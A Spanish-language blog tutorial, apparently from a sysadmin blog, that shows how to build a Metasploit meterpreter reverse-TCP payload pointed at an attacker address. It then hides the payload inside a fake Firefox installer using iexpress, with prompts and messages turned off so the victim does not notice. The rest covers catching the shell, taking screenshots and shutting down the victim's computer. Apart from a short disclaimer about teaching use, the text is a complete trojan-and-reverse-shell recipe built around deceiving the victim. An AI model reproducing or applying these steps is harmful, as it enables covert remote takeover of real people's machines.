Este tutorial esta creado con fines didácticos, en un entorno controlado con máquinas virtuales, todo mal uso que se haga de ello, queda fuera de mi responsabilidad.
Lo
primero que hacemos al abrir el kali, ver qué dirección IP tenemos. En nuestro
caso es la 192.168.1.122.
Nos
vamos ahora a las herramientas del kali e iniciamos el servicio de metasploit.
Y
ahora iniciamos la consola de metasploit con msfconsole.
Para
realizar el ataque debemos generar un archivo ejecutable, que es el que nos va
a permitir tener el acceso al sistema que se va a atacar.
Se
va a escribir lo siguiente que es la línea que generara el archivo.exe, que
será enviado a nuestro objetivo.
msfpayload windows/meterpreter/reverse_tcp lhost
=192.168.1.122 lport=4444 x> crack.exe
Pasamos
el archivo a Windows
Ejecutamos
el comando use
multi/handler con esto nos quedamos a la escucha de que la víctima
ejecute el .exe para conectarnos a ella.
Utilizaremos
una utilidad de Windows llamada iexpress para empaquetar él .exe en una aplicación
como Firefox por ejemplo.
Creamos
un archivo nuevo.
Elegimos
que instale el contenido.
Le
ponemos un nombre.
Seleccionamos
no prompt para no levantar sospechas.
No
mostrar acuerdo de licencia.
Lo
siguiente es darle en añadir y seleccionamos él .exe y el programa a instalar,
en este caso firefox.
Le
decimos que programa instalar primero y luego cual es segundo lugar.
La
siguiente ventana la dejamos en default.
No
daremos ningún mensaje para no dar sospechas de manipulación.
Tampoco
necesita reiniciar la máquina.
Guardamos
el archivo con el nombre exacto de Firefox.
El
instalador terminado queda de esta manera.
Cuando se ejecuta en la víctima vemos como el
kali a la escucha entra en meterpreter.
Para
verificar la intrusión, podemos sacar una impresión de pantalla, de la máquina
con un screenshot
La
imagen obtenida se encuentra en el home del kali Linux.
Otra
cosa interesante es saber qué puedes apagar el ordenador de la víctima con shutdown
fuente; http://sysadminapp89.blogspot.com.es/
No hay comentarios:
Publicar un comentario